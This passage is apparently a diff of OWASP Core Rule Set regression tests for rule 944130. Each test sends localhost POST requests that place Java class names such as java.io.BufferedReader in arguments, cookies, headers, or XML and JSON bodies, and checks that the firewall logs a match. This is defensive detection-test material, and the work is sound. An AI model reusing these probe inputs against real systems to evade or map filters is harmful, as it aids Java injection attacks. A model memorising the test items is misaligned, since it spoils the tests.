"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.BufferedInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-24 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.BufferedInputStream" + output: + log_contains: "id \"944130\"" + - test_id: 24 desc: "Argument name includes keyword java.io.BufferedInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.BufferedInputStream=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-25 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.BufferedInputStream=test" + output: + log_contains: "id \"944130\"" + - test_id: 25 desc: "Cookie test includes keyword java.io.BufferedInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.BufferedInputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-26 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.BufferedInputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 26 desc: "Cookie name includes keyword java.io.BufferedInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.BufferedInputStream=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-27 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.BufferedInputStream=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 27 desc: "Request header test includes keyword java.io.BufferedInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.BufferedInputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-28 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.BufferedInputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 28 desc: "XML attribute value includes keyword java.io.BufferedInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-29 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_id: 29 desc: "XML element value includes keyword java.io.BufferedInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.BufferedInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-30 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.BufferedInputStream" + output: + log_contains: "id \"944130\"" + - test_id: 30 desc: "Nested XML element value includes keyword java.io.BufferedInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.BufferedInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-31 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.BufferedInputStream" + output: + log_contains: "id \"944130\"" + - test_id: 31 desc: "Content-Type text/plain includes keyword java.io.BufferedInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.BufferedInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-32 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.BufferedInputStream" + output: + log_contains: "id \"944130\"" + - test_id: 32 desc: "Content-Type application/json arg value includes keyword java.io.BufferedInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.BufferedInputStream\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-33 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.BufferedInputStream\"}" + output: + log_contains: "id \"944130\"" + - test_id: 33 desc: "Content-Type application/json arg name includes keyword java.io.BufferedInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.BufferedInputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-34 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.BufferedInputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_id: 34 desc: "Argument test includes keyword java.io.BufferedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.BufferedReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-35 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.BufferedReader" + output: + log_contains: "id \"944130\"" + - test_id: 35 desc: "Argument name includes keyword java.io.BufferedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.BufferedReader=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-36 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.BufferedReader=test" + output: + log_contains: "id \"944130\"" + - test_id: 36 desc: "Cookie test includes keyword java.io.BufferedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.BufferedReader - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-37 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.BufferedReader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 37 desc: "Cookie name includes keyword java.io.BufferedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.BufferedReader=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-38 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.BufferedReader=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 38 desc: "Request header test includes keyword java.io.BufferedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.BufferedReader - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-39 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.BufferedReader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 39 desc: "XML attribute value includes keyword java.io.BufferedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-40 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_id: 40 desc: "XML element value includes keyword java.io.BufferedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.BufferedReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-41 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.BufferedReader" + output: + log_contains: "id \"944130\"" + - test_id: 41 desc: "Nested XML element value includes keyword java.io.BufferedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.BufferedReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-42 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.BufferedReader" + output: + log_contains: "id \"944130\"" + - test_id: 42 desc: "Content-Type text/plain includes keyword java.io.BufferedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.BufferedReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-43 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.BufferedReader" + output: + log_contains: "id \"944130\"" + - test_id: 43 desc: "Content-Type application/json arg value includes keyword java.io.BufferedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.BufferedReader\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-44 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.BufferedReader\"}" + output: + log_contains: "id \"944130\"" + - test_id: 44 desc: "Content-Type application/json arg name includes keyword java.io.BufferedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.BufferedReader\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-45 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.BufferedReader\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_id: 45 desc: "Argument test includes keyword java.io.ByteArrayInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.ByteArrayInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-46 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.ByteArrayInputStream" + output: + log_contains: "id \"944130\"" + - test_id: 46 desc: "Argument name includes keyword java.io.ByteArrayInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.ByteArrayInputStream=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-47 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.ByteArrayInputStream=test" + output: + log_contains: "id \"944130\"" + - test_id: 47 desc: "Cookie test includes keyword java.io.ByteArrayInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.ByteArrayInputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-48 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.ByteArrayInputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 48 desc: "Cookie name includes keyword java.io.ByteArrayInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.ByteArrayInputStream=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-49 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.ByteArrayInputStream=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 49 desc: "Request header test includes keyword java.io.ByteArrayInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.ByteArrayInputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-50 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.ByteArrayInputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 50 desc: "XML attribute value includes keyword java.io.ByteArrayInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-51 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: 